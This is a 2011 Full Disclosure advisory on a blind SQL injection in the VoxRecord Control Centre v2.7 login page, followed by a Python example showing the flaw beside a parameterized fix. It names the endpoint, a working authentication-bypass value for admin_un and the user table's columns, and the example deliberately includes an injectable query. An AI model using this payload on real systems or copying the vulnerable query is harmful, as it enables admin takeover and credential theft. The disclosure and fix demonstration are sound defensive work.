Full Disclosure mailing list archives
Voxsmart VoxRecord Control Centre - Blind SQLi and auth. bypass
From: Piotr Duszynski <piotr () duszynski eu>
Date: Wed, 30 Nov 2011 13:06:39 +0100
=======================================================================
VoxRecord Control Centre - version 2.7 Blind SQLi and auth. bypass
=======================================================================

Affected Software : Voxsmart - VoxRecord Control Centre v. 2.7
Severity          : Critical
Local/Remote      : Remote
Author            : Piotr Duszynski @drk1wi

[Summary]

A blind SQLi exists in the /vcc/login.php login page. It can be used either for authentication bypass (admin privileges gained) or for login:pass extraction from the 'voxsuser' database table.

[Vulnerability Details]

HTTP POST : /vcc/login.php

admin_un=adm[ BLIND SQL INJECTION]&admin_pw=adddm

- Authentication bypass: set admin_un to "admin'%20or%201%3d1--"
- Blind SQLi data extraction: 'voxsuser' table columns

+-------------------------+----+----------------------------+-----------------------------------------------+------------+------------+
| email | id | is_loged | password | user_type | username |
+-------------------------+----+----------------------------+-----------------------------------------------+------------+------------+

[Time-line]

1/10/2011 - Vendor notified
??? - Vendor response
??? - Vendor patch release
30/11/2011 - Public disclosure

Cheers,
@drk1wi
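The following is an added example, not part of the original post and not the vendor's code: it models the class of flaw the advisory describes (request fields spliced into the login query) beside the parameterized fix. The function names, the in-memory SQLite stand-in for the 'voxsuser' table, and the sample row are assumptions; the real login.php source and database engine are not shown in the advisory.

```python
import sqlite3
from urllib.parse import unquote

# admin_un value quoted in the advisory, as the server sees it after URL decoding.
BYPASS_UN = unquote("admin'%20or%201%3d1--")  # admin' or 1=1--


def make_db():
    """In-memory stand-in for the 'voxsuser' table (constructed sample row)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE voxsuser (id INTEGER PRIMARY KEY, username TEXT,"
               " password TEXT, user_type TEXT)")
    db.execute("INSERT INTO voxsuser (username, password, user_type)"
               " VALUES (?, ?, ?)",
               ("admin", "constructed-sample-secret", "admin"))
    return db


def login_concatenated(db, admin_un, admin_pw):
    """Assumed vulnerable pattern: POST fields become part of the SQL text."""
    sql = ("SELECT user_type FROM voxsuser WHERE username = '" + admin_un +
           "' AND password = '" + admin_pw + "'")
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return None  # malformed SQL caused by the input is treated as a failed login
    return row[0] if row else None


def login_parameterized(db, admin_un, admin_pw):
    """Fix: placeholders keep both fields as data, so quotes and '--' are inert."""
    # Password storage (hashing) is a separate control and is not modelled here.
    sql = "SELECT user_type FROM voxsuser WHERE username = ? AND password = ?"
    row = db.execute(sql, (admin_un, admin_pw)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # The quote closes the string literal and '--' comments out the password check.
    print("concatenated :", login_concatenated(db, BYPASS_UN, "adddm"))
    # Bound as a parameter, the same value is only an unknown username.
    print("parameterized:", login_parameterized(db, BYPASS_UN, "adddm"))
```

Run against the advisory's admin_un value, the concatenated query returns the admin row without a valid password, while the parameterized query returns nothing.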